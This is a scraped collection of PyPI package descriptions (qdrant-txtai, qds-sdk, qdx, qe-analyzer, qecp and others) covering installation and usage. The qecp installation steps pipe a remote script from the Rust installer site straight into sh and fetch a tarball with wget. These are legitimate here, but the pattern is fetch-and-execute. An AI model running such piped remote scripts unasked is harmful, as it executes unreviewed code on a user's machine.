database likeQdrant. It offers not only a powerful engine for neural\nsearch, but also allows setting up a whole cluster if your data does not fit\na single machine anymore. It is production grade and can be launched easily\nwith Docker.Combining the easiness of txtai with Qdrant's performance enables you to build\nproduction-ready semantic search applications way faster than before.InstallationThe library might be installed with pip as following:pipinstallqdrant-txtaiUsageRunning the txtai application with Qdrant as a vector storage requires launching\na Qdrant instance. 
That might be done easily with Docker:\n\ndocker run -p 6333:6333 -p 6334:6334 qdrant/qdrant:v1.0.1\n\nRunning the txtai application might be done either programmatically or by providing configuration in a YAML file.\n\nProgrammatically\n\nfrom txtai.embeddings import Embeddings\n\nembeddings = Embeddings({\n    \"path\": \"sentence-transformers/all-MiniLM-L6-v2\",\n    \"backend\": \"qdrant_txtai.ann.qdrant.Qdrant\",\n})\nembeddings.index([(0, \"Correct\", None), (1, \"Not what we hoped\", None)])\nresult = embeddings.search(\"positive\", 1)\nprint(result)\n\nVia YAML configuration\n\n# app.yml\nembeddings:\n  path: sentence-transformers/all-MiniLM-L6-v2\n  backend: qdrant_txtai.ann.qdrant.Qdrant\n\nCONFIG=app.yml uvicorn \"txtai.api:app\"\n\ncurl -X GET \"http://localhost:8000/search?query=positive\"\n\nConfiguration properties\n\nqdrant-txtai allows you to configure both the connection details and some internal properties of the vector collection which may impact both speed and accuracy. Please refer to Qdrant docs if you are interested in the meaning of each property.\n\nThe example below presents all the available options, if we connect to a Qdrant server:\n\nembeddings:\n  path: sentence-transformers/all-MiniLM-L6-v2\n  backend: qdrant_txtai.ann.qdrant.Qdrant\n  metric: l2 # allowed values: l2 / cosine / ip\n  qdrant:\n    url: qdrant.host\n    port: 6333\n    grpc_port: 6334\n    prefer_grpc: true\n    collection: CustomCollectionName\n    https: true # for Qdrant Cloud\n    api_key: XYZ # for Qdrant Cloud\n    hnsw:\n      m: 8\n      ef_construct: 256\n      full_scan_threshold:\n      ef_search: 512\n\nLocal in-memory/disk-persisted mode\n\nQdrant Python client, from version 1.1.1, supports local in-memory/disk-persisted mode. That's a good choice for any test scenarios and quick experiments in which you do not plan to store lots of vectors. In such a case, spinning up a Docker container might not even be required.\n\nIn-memory storage\n\nIn case you want transient storage, for example for automated tests launched during your CI/CD pipeline, using Qdrant Local mode with in-memory storage might be a preferred option.\n\nembeddings:\n  path: sentence-transformers/all-MiniLM-L6-v2\n  backend: qdrant_txtai.ann.qdrant.Qdrant\n  metric: l2 # allowed values: l2 / cosine / ip\n  qdrant:\n    location: ':memory:'\n    prefer_grpc: true\n\nOn disk storage\n\nHowever, if you prefer to keep the vectors between different runs of your application, it might be better to use on disk storage and pass the path that should be used to persist the data.\n\nembeddings:\n  path: sentence-transformers/all-MiniLM-L6-v2\n  backend: qdrant_txtai.ann.qdrant.Qdrant\n  metric: l2 # allowed values: l2 / cosine / ip\n  qdrant:\n    path: '/home/qdrant/storage_local'\n    prefer_grpc: true"} +{"package": "qdrant-utils", "pacakge-description": "qdrant-utils\n\nDescribe your project here."} +{"package": "qdrouter-jinja2", "pacakge-description": "UNKNOWN"} +{"package": "qds_app", "pacakge-description": "# qds_app\nA Python egg to support migrations in your project[![Build Status](https://travis-ci.org/vrajat/qds_app.svg?branch=master)](https://travis-ci.org/vrajat/qds_app)"} +{"package": "qdscreen", "pacakge-description": "qdscreen\n\nRemove redundancy in your categorical variables and increase your models' performance. qdscreen is a python implementation of the Quasi-determinism screening algorithm from T.Rahier's PhD thesis, 2018.\n\nThe documentation for users is available here: https://python-qds.github.io/qdscreen/\n\nA readme for developers is available here: https://github.com/python-qds/qdscreen"} +{"package": "qdsl", "pacakge-description": "Overview\n\nMake digging around in nests of python dicts and lists less tedious.\n\nOptimizations\n\nIntern node names so the strings aren't duplicated. 
This saves a huge amount of memory, especially for things like openshift resources.Desugar/compile queries into regular python functions, special casing where possible.Generate regular python functions from Boolean ASTs passed to queries. The \"compilation\" takes microseconds.Query the entire flattened tree at once in \"find\" since it's equivalent to querying individual nodes and accumulating.Simplify the where API so we don't need a separate WhereBoolean hierarchy.Use tuples instead of lists for values and children. Tuples are slightly smaller.Branch \"value\" defaults to an empty tuple. Since it's a default keyword value, all instances share the same one.Use slots."} +{"package": "qds_sdk", "pacakge-description": "A Python module that provides the tools you need to authenticate with,\nand use the Qubole Data Service API.InstallationFrom PyPIThe SDK is available onPyPI.$ pip install qds-sdkFrom sourceGet the source code:Either clone the project:git clonegit@github.com:qubole/qds-sdk-py.gitand checkout latest release tag fromReleases.Or download one of the releases fromhttps://github.com/qubole/qds-sdk-py/releasesRun the following command (may need to do this as root):$ python setup.py installAlternatively, if you use virtualenv, you can do this:$ cd qds-sdk-py\n$ virtualenv venv\n$ source venv/bin/activate\n$ python setup.py installThis should place a command line utilityqds.pysomewhere in your\npath$ which qds.py\n/usr/bin/qds.pyCLIqds.pyallows running Hive, Hadoop, Pig, Presto and Shell commands\nagainst QDS. Users can run commands synchronously - or submit a command\nand check its status.$ qds.py -h # will print detailed usageExamples:run a hive query and print the results$ qds.py --token 'xxyyzz' hivecmd run --query \"show tables\"\n$ qds.py --token 'xxyyzz' hivecmd run --script_location /tmp/myquery\n$ qds.py --token 'xxyyzz' hivecmd run --script_location s3://my-qubole-location/myquerypass in api token from bash environment variable$ export QDS_API_TOKEN=xxyyzzrun the example hadoop command$ qds.py hadoopcmd run streaming -files 's3n://paid-qubole/HadoopAPIExamples/WordCountPython/mapper.py,s3n://paid-qubole/HadoopAPIExamples/WordCountPython/reducer.py' -mapper mapper.py -reducer reducer.py -numReduceTasks 1 -input 's3n://paid-qubole/default-datasets/gutenberg' -output 's3n://example.bucket.com/wcout'check the status of command # 12345678$ qds.py hivecmd check 12345678\n{\"status\": \"done\", ... }If you are hitting api_url other than api.qubole.com, then you can pass it in command line as--urlor set in as env variable$ qds.py --token 'xxyyzz' --url https://.qubole.com/api hivecmd ...\n\nor\n\n$ export QDS_API_URL=https://.qubole.com/apiSDK APIAn example Python application needs to do the following:Set the api_token and api_url (if api_url other than api.qubole.com):from qds_sdk.qubole import Qubole\n\nQubole.configure(api_token='ksbdvcwdkjn123423')\n\n# or\n\nQubole.configure(api_token='ksbdvcwdkjn123423', api_url='https://.qubole.com/api')Use the Command classes defined in commands.py to execute commands.\nTo run Hive Command:from qds_sdk.commands import *\n\nhc=HiveCommand.create(query='show tables')\nprint \"Id: %s, Status: %s\" % (str(hc.id), hc.status)example/mr_1.pycontains a Hadoop Streaming exampleReporting Bugs and Contributing CodeWant to report a bug or request a feature? Please openan issue.Want to contribute? 
Fork the project and create a pull request with your changes againstunreleasedbranch."} +{"package": "qdts-client", "pacakge-description": "No description available on PyPI."} +{"package": "qdts-node", "pacakge-description": "No description available on PyPI."} +{"package": "qdts-orchestrator", "pacakge-description": "No description available on PyPI."} +{"package": "qdudomportal", "pacakge-description": "Project: qdudomportal-----------------------Project History: qdudomportal-----------------------"} +{"package": "qdune", "pacakge-description": "# qduneTools for processing raw (point cloud) multibeam bathymetric surveys of\nmigrating bed forms."} +{"package": "qdupe", "pacakge-description": "UNKNOWN"} +{"package": "qduTAportal", "pacakge-description": "Project: qduTAportal-----------------------Project History: qduTAportal------------------------ 2015-05-12- Modify: use json save user info- 2015-04-18- Add: auto logout every 14 minutes- Add: if the account may be used, try logout first, then login again- Fix Bug: catch Heart Beat Error- 2015-04-12- Fix bug: login confition: checkAccess Index First- 2015-04-02- if it failed to connect portal, then sleep 10 seconds, try again.- 2015-03-19- fix bug: never do evil --> baidu.com- fix bug: connect 172.20.1.1 failed- 2015-03-10- rewrite Portal.checkLogin Function.- add some menus"} +{"package": "qdutils", "pacakge-description": "No description available on PyPI."} +{"package": "qdvis", "pacakge-description": "qdvis (Quick Data Visualizer)This is a tool to easily visualize the logs when long time processing is required by simply starting up a local server.Installationpip install qdvisUsageExmaple of code. Let the log be added to the writer object anywhere in the code (e.g., loop).fromqdvis.writerimportLogWriterwriter=LogWriter()num_epochs=10forepochinrange(num_epochs):forinputs,targetsindata_loader:outputs=model(inputs)loss=criterion(outputs,targets)optimizer.zero_grad()loss.backward()optimizer.step()print(f\"Epoch{epoch+1}/{num_epochs}, Loss:{loss.item()}\")writer.add_scalar(x_value=epoch,y_value=loss.item())You can start a terminal and launch a local server for visualization with theqdviscommand.qdvis --logpath ./logs/log.json --port 8000--logpath: path for log file.--port: port of local server.Methodsgpu utilization can be added to the logadd_scaler(x_value, y_value)Parametersx_value(float): x scaler value of 2D chart.y_value(float): y scaler value of 2D chart.2D chart can be added to the logadd_gpu_status()"} +{"package": "qdx", "pacakge-description": "QDX-py: Python SDK for the QDX APIThis package exposes a simple provider and CLI for the different tools exposed by the QDX GraphQL API.UsageAs a libraryimportjsonfrompathlibimportPathimportqdxfromqdx.dataimportrun_convert,QDXV1QCMol,QDXV1QCInputURL=\"url to the qdx api\"TOKEN=\"your qdx access token\"# get our client to talk with the APIclient=qdx.QDXProvider(url=URL,access_token=TOKEN)# path to protein pdb with correct charges and protonationprotein_pdb=Path(\"./examples/4w9f_prepared_protein.pdb\")# path to ligand sdf with correct charges and protonationligand_sdf=Path(\"./examples/3JU_prepared.sdf\")# convert pdb to qdxfprotein_qdxf=client.obabel_to_complex(file=protein_pdb,format=\"pdb\")# convert ligand sdf to qdxfligand_qdxf=client.obabel_to_complex(file=ligand_sdf,format=\"sdf\")# We need to treat the ligand as a single fragmentligand_qdxf[\"topology\"][\"fragments\"]=[[xforx,_inenumerate(ligand_qdxf[\"topology\"][\"symbols\"])]]ligand_qdxf[\"topology\"][\"fragment_charges\"]=[0]# We 
also need to drop connectivity information (temporary)ligand_qdxf[\"topology\"][\"connectivity\"]=[]# fragment proteinfragged_protein=client.fragment_complex(protein_qdxf,backbone_steps=5)# combine fragmented protein and ligand into a single complexcomplex=client.combine_complexes(fragged_protein,ligand_qdxf)# create a qdx/hermes input file for complexqdx_input=qdx.data.run_convert(json.dumps(complex),\"qdxcomplex2qdxv1\")# Configure input for lattice calculationqdx_input.model.fragmentation=Trueqdx_input.keywords.frag.lattice_energy_calc=True# The reference monomer should be the final fragment,# as that will be the ligandqdx_input.keywords.frag.reference_monomer=len(qdx_input.molecule.fragments)-1qdx_input.keywords.frag.monomer_cutoff=20qdx_input.keywords.frag.dimer_cutoff=10qdx_input.model.method=\"RIMP2\"# Start hermes calculation -# remember to set tags that reference your systemproc=client.start_quantum_energy_calculation(qdx_input,tags=[\"rimp2\",\"4w9f\",\"3ju\",\"manual_prep\",\"debug_charges\"])# Fetch results - you will have to run this multiple times until# the calculation is doneresult=client.get_proc(proc)As a CLI# All cli calls have these standard arguments, referred to as \u2026 in future examplesqdx--urlQDX_API_URL--access-tokenQDX_ACCESS_TOKEN# Post a hermes job, returning a task id\u2026--post-quantum-energy<./path_to_qdxv1_input.json# Retrieve the hermes job, or its progress\u2026--get-procTASK_ID## Other functions# Return a qdx complex json object and save it as complex.json\u2026--pdb-to-complexPATH_TO_PDB_FILE>complex.json# Prepare a protein for quauntum energy calculation\u2026--prepare-proteinsimulation--poll<./complex.json>prepped_protein_complex.json# Fragment a qdx complex json object\u2026--fragment-complex[MIN_STEPS_ALONG_PROTEIN_BACKBONE_BEFORE_CUTTING_AT_C-C_BOND]fragmented_protein_complex.json# Prepare a ligand for quauntum energy calculation\u2026--prepare-ligandsimulation--poll<./path_to_ligand.sdf>prepped_ligand_complex.json# Combine protein and ligand complexes for simulation\u2026--combine-complexes./prepped_protein_complex.json<./prepped_ligand_complex.sdf>protein_ligand_complex.json# Convert a qdx complex into a qdx input file\u2026--convert./protein_ligand_complex.json--directionqdxcomplex2qdxv1>qdx_input.json# Convert a qdx complex into a exess input file\u2026--convert./protein_ligand_complex.json--directionqdxcomplex2exess>exess_input.json# Convert a qdx input file into an exess input file\u2026--convertqdx_input.json--directionqdxv12exess>exess_input.json"} +{"package": "qdx-py", "pacakge-description": "QDX-pyPython bindings to qdx-commons, built withmaturin / py03.NAME\n qdx_py - QDX-Common utilities for python\n\nPACKAGE CONTENTS\n qdx_py\n\nFUNCTIONS\n concat(conformer_1_contents, conformer_2_contents)\n Takes two conformer json strings and concatenates them\n\n conformer_to_pdb(conformer_contents)\n Returns the pdb string for a qdx conformer json string\n\n formal_charge(conformer_contents, strictness)\n Charges standard amino acids given a conformer json string,\n\n fragment(conformer_contents, backbone_steps, terminal_fragment_sidechain_size=Ellipsis)\n Fragments a conformer, updating the fragment formal charges based on existing atom charges\n\n pdb_to_conformer(pdb_contents, keep_residues=Ellipsis, skip_residues=Ellipsis)\n Converts a pdb string into an array of qdx conformers as a json stringUsageimportqdx_py# get json string of conformerconformer=qdx_py.pdb_to_conformer(open(\"../qdx-common/tests/data/6mj7.pdb\").read())# get pdb of 
conformerpdb=qdx_py.conformer_to_pdb(conformer)Developing~setupvenv\nmaturindevelop\npython\n~importqdx_pyPublishingexportMATURIN_PYPI_TOKEN=[yourtoken]maturinpublish--manylinux2_28--zig-f"} +{"package": "qdyn", "pacakge-description": "QDYN Python PackageQDYN-pylib is a Python packageqdynfor interacting with theFortran QDYN library and tools. Its purpose is to:generate config files and input data for QDYNread data generated by QDYN routinesprovide tools for debugging, testing, and documenting QDYNwrap QDYN's \"utility\" programs likeqdyn_prop_trajandqdyn_optimizeprovide interoperability of QDYN with other optimal control and quantum packages likescipy.optimize,QuTiPand theKrotov Python Package.The package isnota direct wrapper around QDYN that would allow to call QDYN Fortran routines from Python.InstallationTo install the latest released version of QDYN-pylib, run this command in your terminal:pip install qdynThis is the preferred method to install QDYN-pylib, as it will always install the most recent stable release.If you are a QDYN developer, you can install the latest development version of QDYN-pylib with the following command:pip install git+git@gitlabph.physik.fu-berlin.de:ag-koch/qdyn.git@main#egg=qdyn&subdirectory=qdynpylib"} +{"package": "qe", "pacakge-description": "No description available on PyPI."} +{"package": "qe-analyzer", "pacakge-description": "qe_analyzer\nconvergenceTests.py\n[ecut, planewaves, energy, ecut**(3/2)]=extractECUTConvergenceInfo(file1)\n\"head_ECUTcovergencePlot.png\"=ECUTconvergenceTest(head, calcThresh=False, thresh=0.05)\n\"TotEvsInequivK.png\"=KconvergenceTest(fmt='*.out')\nkx, ky, kz, shiftx, khifty, shiftz, ecutwfc, energy, inequiv, time=extractKConvergenceInfo(file1)\na, cba, totEnergy=importacLatticeParamEnergyFile(fname)\nmat, unA, unCbA, data=importAllLatParamFiles(fmt)\n\"print(min data point a=, c/a=)\"=plotCbAvsA(fmt, lim=0)\ncopyPaste.py\n\"updated file\"=insertKptsFromXcrysden(kpfFile, updateFile)\n\"output file and lines in console describing what is being replaced to allow for verification\"=vcRelaxTransfer(inFileHead, outputF)\nelectronBands.py\n[Ef, booleanHighestOccupied]=getEfSCF(scfFile)\n[k, energies]=importBands(file)\n[k, energies, xCoordinates, highSymmetryPoints]=buildBands(file2)\nplotBands(file, Ef=0, Kcoord=True, lbls=[], figsize=plt.rcParams.get('figure.figsize'), pad=1.08)\nphonons.py\nx, energy=importFreqGp(fname)\npts, flfrq=generateXcoordMatdyn(matdynFile)\nplotPhononDispersion_cm(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])\nplotPhononDispersion_meV(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])convergenceTests.extractECUTConvergenceInfo(file1):\n\"\"\"extracts ECUT convergence information from a given file, file1\noutputs a list of [ECUT, # planewaves, energy, CPU time, and ECUT**(3/2)]Parameters\n----------\nfile1 : str\n DESCRIPTION. File to read in\n\nReturns list containing\n-------\necutwfc : float\n DESCRIPTION. ECUT value \nplanewaves : float\n DESCRIPTION. number of planewaves\nenergy : float\n DESCRIPTION. Total Energy\ntime: float\n\tDESCRIPTION. CPU time\necutwfc**(3/2): float\n\tDESCRIPTION. ECUT value to the 2/3 power. 
Ecut**(2/3) should be proportional to the number of planewaves\n\n\"\"\"convergenceTests.ECUTconvergenceTest(head, calcThresh=False, thresh=0.05)\n\"\"\" Prints the filenames imported for an ECUT convergence test (series of files where ECUT is changing)\nassumes '${head}-${ECUT}.out' file naming,\nwill ignore all other files in folder.\nPrints the filenames that it imports for this also saves the plotParameters\n----------\nhead : str\n DESCRIPTION. The header to the filename. Assumes that your working directory contains files with \n\t '${head}-${ECUT}.out' formatting\ncalcThresh : boolean, optional\n\tDESCRIPTION. Do you want to pull out the ECUT associated with a convergence threshold?\n\nthresh : float\n\tDESCRIPTION. The convergence threshold you would like\nReturns\n-------\nNone. A plot should show up and will be automatically saved to your working directory.\n\"\"\"convergenceTests.extractKConvergenceInfo(file1)\n\"\"\"\nkx, ky, kz, shiftx, shifty, shiftx, ecutwfc, energy, inequiv,time =extractKConvergenceInfo('SrTiO3-260-0-16.out')Parameters\n----------\nfile1 : str\n DESCRIPTION. name of *.out file to extract information from\n\nReturns\n-------\nkx : int\n DESCRIPTION.# k points in x direction\nky : int\n DESCRIPTION. # k points in y direction\nkz : int\n DESCRIPTION. # k points in z direction\nshiftx : int\n DESCRIPTION.0 or 1\nshifty : int\n DESCRIPTION.0 or 1\nshiftz : int\n DESCRIPTION.0 or 1\necutwfc : float\n DESCRIPTION. cutoff energy\nenergy : float\n DESCRIPTION. total energy\ninequiv : int\n DESCRIPTION. Number inequivalent k points\ntime : float\n DESCRIPTION. CPU time in minutes\n\n\"\"\"convergenceTests.KconvergenceTest(fmt='.out')\n\"\"\"\nplots energy vs # k point mesh in x, y, and z directions. If all equal, only does one plot\nKconvergenceTest('SrTiO3-260--*.out')Parameters\n----------\nfmt : string, optional\n DESCRIPTION. The default is '*.out'. filename format for searching the working directory. This is like glob\n\nReturns\n-------\nNone.\n\"\"\"convergenceTests.importacLatticeParamEnergyFile(fname)\n'''Parameters\n----------\nfname : TYPE\n DESCRIPTION.\n\nReturns\n-------\na : float\n DESCRIPTION. lattice constant a in Bohr\ncba : float\n DESCRIPTION.c/a ratio\ntotEnergy : float\n DESCRIPTION. total energy in Ry\n\n'''convergenceTests.importAllLatParamFiles(fmt)\n\"\"\"\nimport all lattice parameter files. Use this for debugging any issues with plotCbAvsA. This is used in plotCbAvsA.\nPrints the filenames of all files imported to allow you to check that things import properly\nParameters\n----------\nfmt : str\nDESCRIPTION. Format used by glob to describe the files involved in the lattice parameter dataReturns\n-------\nmat : numpy array of floats\n DESCRIPTION. Array of total energies\nunA : 1-d sorted numpy array\n DESCRIPTION. Array of unique values in the a-lattice parameter\nunCbA : 1-d sorted numpy array\n DESCRIPTION. Array of unique values in c/a\ndata : numpy array\n DESCRIPTION. raw data extracted from files, useful for debugging\n\n\"\"\"convergenceTests.plotCbAvsA(fmt, lim=0):\n\"\"\"\nPlots C/A vs A when A is in Bohr\nfmt='graphite__.out'plotCbAvsA(fmt)Parameters\n----------\nfmt : str\nDESCRIPTION. Format used by glob to describe the files involved in the lattice parameter data\nlim : float, optional\nDESCRIPTION. The default is -45.599. 
Describes the energy threshold above which all become one color.Returns\n-------\nNone.\n\n\"\"\"copyPaste.insertKptsFromXcrysden(kpfFile, updateFile):\n\"\"\"\nGenerates a new *.in file entitled updateFile(minus.in)_update.in\nby incorporating the k-points listed in kpfFile\n(real form of k-point coordinates)Parameters\n----------\nkpfFile : str\n DESCRIPTION. Filename, including extension, of the XCRYSDEN *.kpf file \n containing the points you want to add\nupdateFile : TYPE\n DESCRIPTION. Filename, including extension, of the *.in file that you \n want to update/replace k-points of. This should leave other blocks alone.\n\nReturns\n-------\nNone.\n\n\"\"\"copyPaste.vcRelaxTransfer(inFileHead, outputF):\n'''\nApplies the new lattice parameters and atom sites obtained from a vc-relax calculation to a new *.in file\nexample: vcRelaxTransfer('Si-vcRelax', 'Si-vcRelax2.in')\nCaution: Not fully tested.Parameters\n----------\ninFileHead : str\n DESCRIPTION. Head of pw.x input and output files used for vc-relax calculation ([HEAD].in and [HEAD].out). No extension included\noutputF : str\n DESCRIPTION. Name of the new pw.x input file that you want to create. MUST INCLUDE *.in EXTENSION!\n\nReturns\n-------\nNone.\n\n'''electronBands.getEfSCF(scfFile):\n\"\"\" Extracts Fermi level from SCF fileParameters\n----------\nscfFile : str\n DESCRIPTION. Filename (or path to file and filename)\n\nReturns\n-------\nlist\n DESCRIPTION. [Ef, highest occupied], The first element is the Fermi level. \n The second element is a boolean describing whether the file said it was \n the highest occupied orbital (True) or truly the Fermi level (False) \n\n\"\"\"electronBands.importBands(file):\n\"\"\" import bands structure in a mannner ready for plotting\nParameters\n----------\nfile : str\nDESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nKcoord : boolean, optionalReturns\n-------\nk : array of float64\n DESCRIPTION. x-coordinates associated with k-points to use for plot. This is a 1-d array (vector)\nEnergies : array of float64\n DESCRIPTION. array such that each column represents a band\nx2 : list\n DESCRIPTION. x-coordinates associated with special k points\nhsp : list\n DESCRIPTION. Each element in the list is a set of coordinates [kx, ky, kz] \n describing the high-symmetry points. \n\"\"\"electronBands.buildBands(file2):\n\"\"\"Extracts energy vs k for plotting into 1D array k and numpy array;\nalso extracts special points for plottingParameters\n----------\nfile2 : str\n DESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nKcoord : boolean, optional\n\nReturns\n-------\nk : array of float64\n DESCRIPTION. x-coordinates associated with k-points to use for plot. This is a 1-d array (vector)\nEnergies : array of float64\n DESCRIPTION. array such that each column represents a band\nx2 : list\n DESCRIPTION. x-coordinates associated with special k points\nhsp : list\n DESCRIPTION. Each element in the list is a set of coordinates [kx, ky, kz] \n describing the high-symmetry points. \n\n\"\"\"electronBands.plotBands(file, Ef=0, Kcoord=True, lbls=[], figsize=plt.rcParams.get('figure.figsize'), pad=1.08):\n\"\"\" Return a plot of the data from file.\nplotBands(file)\nplotBands(file, getEfSCF('si_scf.out')[0], False, ['L', r'$\\Gamma$', 'X'])\nplotBands(file, 0, False, ['L', r'$\\Gamma$', 'X'])Parameters\n----------\nfile : str\n DESCRIPTION. band.x output file $[prefix]_bandx.out file generated by running bands.x\nEf : float, optional\n DESCRIPTION. 
Fermi level. Can be extracted using \nKcoord : boolean, optional\n DESCRIPTION. The default is True. For the k-axis, use the special point coordinates (kx, ky, kz) for labels. \n If false, requires lbls to include a list of labels of the appropriate length eg:['L', r'$\\Gamma$', X]\nlbls : list\n DESCRIPTION. The default is []. List of length number of high-symmetry points, optional only if Kcoord=True. \nfigsize: (float, float), optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). Figure width and height in inches\npad: float, optional\n DESCRIPTION. The default is 1.08. Padding around figure for tight_layout\nReturns\n-------\nNone.\n\n\"\"\"phonons.importFreqGp(fname)\n\"\"\"\nimports data from *.freq.gp fileParameters\n----------\nfname : str\n DESCRIPTION.file name to be imported\n\nReturns\n-------\nx: 1-d numpy array\n DESCRIPTION. k point x-value for plotting (2pi/a)\nenergy: 2-d numpy array\n DESCRIPTION. each column is a different band.phonons.generateXcoordMatdyn(matdynFile)\n\"\"\"\ngenerates X-labels (special K-points) from matdyn file\nassumes q_in_band_form=TrueParameters\n----------\nmatdynFile : TYPE\n DESCRIPTION.\n\nReturns\n-------\npts : 2-d numpy array\n DESCRIPTION. special points such that column 0 is kx, column 1 is ky, column 2 is kz, column 3 is the x-coordinate for the E-vs-k plot\nflfrq : str\n DESCRIPTION. filename from matdyn file for where to expect the phonon data for processing (*.freq.gp file)\n\n\"\"\"phonons.plotPhononDispersion_cm(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[]):\n\"\"\"\nPlots phonon dispersion assuming q_in_band_form for special pointsplotPhononDispersion_cm('diamond_matdyn.in')\nplotPhononDispersion_cm('diamond_matdyn.in', labels=['L', r'$\\Gamma$', 'X'])\n\nParameters\n----------\nmatdynF : str\n DESCRIPTION. Filename of the matdyne input file that you used to generate the *.freq.gp file\nfigsize : tuple, optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). See matplotlib.pyplot.plot for details\npad : float, optional\n DESCRIPTION. The default is 1.08. padding around the figure in plt.tight_layout()\nlabels : list of strings, optional\n DESCRIPTION. The default is []. Labels to use for the special points. \n If the length of this is not equal to the number of special points listed in matdynF, these labels will not be used.\n assumes q_in_band_form\n\nReturns\n-------\nNone.\n\n\"\"\"phonons.plotPhononDispersion_meV(matdynF, figsize=plt.rcParams.get('figure.figsize'), pad=1.08 ,labels=[])\n\"\"\"\nPlots phonon dispersion assuming q_in_band_form for special pointsplotPhononDispersion_meV('diamond_matdyn.in')\nplotPhononDispersion_meV('diamond_matdyn.in', labels=['L', r'$\\Gamma$', 'X'])\n\n\nParameters\n----------\nmatdynF : str\n DESCRIPTION. Filename of the matdyne input file that you used to generate the *.freq.gp file\nfigsize : tuple, optional\n DESCRIPTION. The default is plt.rcParams.get('figure.figsize'). See matplotlib.pyplot.plot for details\npad : float, optional\n DESCRIPTION. The default is 1.08. padding around the figure in plt.tight_layout()\nlabels : list of strings, optional\n DESCRIPTION. The default is []. Labels to use for the special points. 
\n If the length of this is not equal to the number of special points listed in matdynF, these labels will not be used.\n assumes q_in_band_form\n\nReturns\n-------\nNone.\n\n\"\"\""} +{"package": "qeapp-xps", "pacakge-description": "Welcome to QEapp XPS plugin!A plugin for calculating X-ray Photoelectron Spectroscopy (XPS) spectra using theXpsWorkChainof aiida-quantumespresso package.Setting PanelThe Setting panel allows users toselect the peak (element and orbital) to be calculated. The availability of peak in the panel depends on the corresponding pseudopotentials.adjust the parameters based on the input structure.Results PanelThe Result panel displays the final XPS spectrum.broadened spectrum using a Voight profile (combined Lorenzian and Gaussian)the chemical shift values (differences in total energy relative to the lowest value)absolute binding energyPseudopotentials\nXPS calculations in QE require core-hole pseudopotentials. We supply a set of pseudopotentials specific to XPS calculations in theXPS Pseudopotential Repository. This repository provides the core-hole pseudopotentials as an AiiDA archive file. There are two kind of pseudopotentials available:pbepbesolWorkChainTo make the setting as simple as possible for user. The following default setting are used.core_hole_treatment.fullfor moleculexch_smearfor metalxch_fixedfor insulatorsupercell_min_parameterupdated based onprotocol."} +{"package": "qec", "pacakge-description": "QEC: Python Tools for Quantum Error CorrectionInstallationThis repo requires the development verison of ldpc for thegf2sparsemodule. Install from (https://github.com/quantumgizmos/ldpc2).The qec package can then be installed using pip.pip install -e ."} +{"package": "qecalc", "pacakge-description": "UNKNOWN"} +{"package": "qeclab", "pacakge-description": "No description available on PyPI."} +{"package": "qecore", "pacakge-description": "## qecore[![Build Status](https://img.shields.io/gitlab/pipeline/dogtail/qecore)](https://gitlab.com/dogtail/qecore/-/pipelines) [![PyPI Version](https://img.shields.io/pypi/v/qecore)](https://pypi.org/project/qecore/)The future goal for qecore is for it to become project template for automation testing.\nAs of now the qecore provides a lot of quality of life features for GNOME Desktop testing.It can be described as a sandbox of sorts for test execution.\nPaired with behave and dogtail this project serves as a useful tool for test execution with minimal required setup.[Project Documentation in gitlab Pages](https://dogtail.gitlab.io/qecore/index.html) - build by CI pipelines on every change### Execute unit testsExecute the tests (from the project root directory) on machine with dogtail:`bash rm-f/tmp/qecore_version_status.txt rm-fdist/*.whlpython3-mbuild python3-mpip install--force-reinstall--upgradedist/qecore*.whlsudo-utestscripts/qecore-headless\"behave-fhtml-pretty-o/tmp/report_qecore.html-fplain tests/features\" `You can use-f prettyinstead of-f plainto get colored output.The standard output should not contain any python traceback, produced HTML should be complete (after first scenario there isStatus)."} +{"package": "qecp", "pacakge-description": "QEC-PlaygroundA research tool to explore Quantum Error Correction (QEC), primarily surface codes.[Error] we're working on the documentation of this project, please wait for a formal release (1.0.0) before you want to use this project.InstallationSee theQEC-Playground Documentation: Installationfor the detailed instructions.\nA brief example is below.# Download the Blossom V 
Library [Optional]wget-chttps://pub.ist.ac.at/~vnk/software/blossom5-v2.05.src.tar.gz-O-|tar-xz\ncp-rblossom5-v2.05.src/*backend/blossomV/\nrm-rblossom5-v2.05.src# Install the Python Dependencies [Optional]sudoaptinstallpython3python3-pip\npip3installnetworkx# Install the Rust Toolchaincurl--proto'=https'--tlsv1.2-sSfhttps://sh.rustup.rs|shsource~/.bashrc# this will add `~/.cargo/bin` to pathcdbackend/rust/\ncargobuild--releasecd../../Command-line InterfaceSee theQEC-Playground Documentation: CLIfor the detailed instructions.\nA brief example use case is below.Runcargo run --release -- --helpunderbackend/rust/folder to get all provided commands of backend program.\nThe option--helpprints out the information of this command, which can be helpful to find subcommands as well as to understand the purpose of each option.\nAn example output is below.QECPlayground 0.1.6\nYue Wu , Namitha Liyanage (namitha.liyanage@yale.edu)\nQuantum Error Correction Playground\n\nUSAGE:\n qecp \n\nOPTIONS:\n -h, --help Print help information\n -V, --version Print version information\n\nSUBCOMMANDS:\n fpga_generator fpga_generator\n help Print this message or the help of the given subcommand(s)\n server HTTP server for decoding information\n test testing features\n tool toolsTo run a simulation to benchmark the logical error rate of decoder, runcargo run --release -- tool benchmark --help. An example output is below.qecp-tool-benchmark0.1.6\nbenchmarksurfacecodedecoders\n\nUSAGE:qecptoolbenchmark[OPTIONS]\n\nARGS:[di1,di2,di3,...,din]codedistanceofverticalaxis[nm1,nm2,nm3,...,nmn]numberofnoisymeasurementrounds,musthaveexactlythesamelengthas`dis`;notethataperfectmeasurementisalwayscappedattheend,sotosimulateasingleroundofperfectmeasurementyoushouldsetthisto0[p1,p2,p3,...,pm]p=px+py+pzunlessnoisemodelhasspecialinterpretationofthisvalue\n\nOPTIONS:--bias_etabias_eta=pz/(px+py)andpx=py,px+py+pz=p.defaultto1/2,whichmeanspx=pz=py[default:0.5]......For example, to test code-distance-3 standard CSS surface code with depolarizing physical error rates 3%, 2% and 1% only on data qubits (i.e. perfect stabilizer measurements) using the default decoder (MWPM decoder), run:cargorun--release--toolbenchmark[3][0][3e-2,2e-2,1e-2]An example result is below.format:

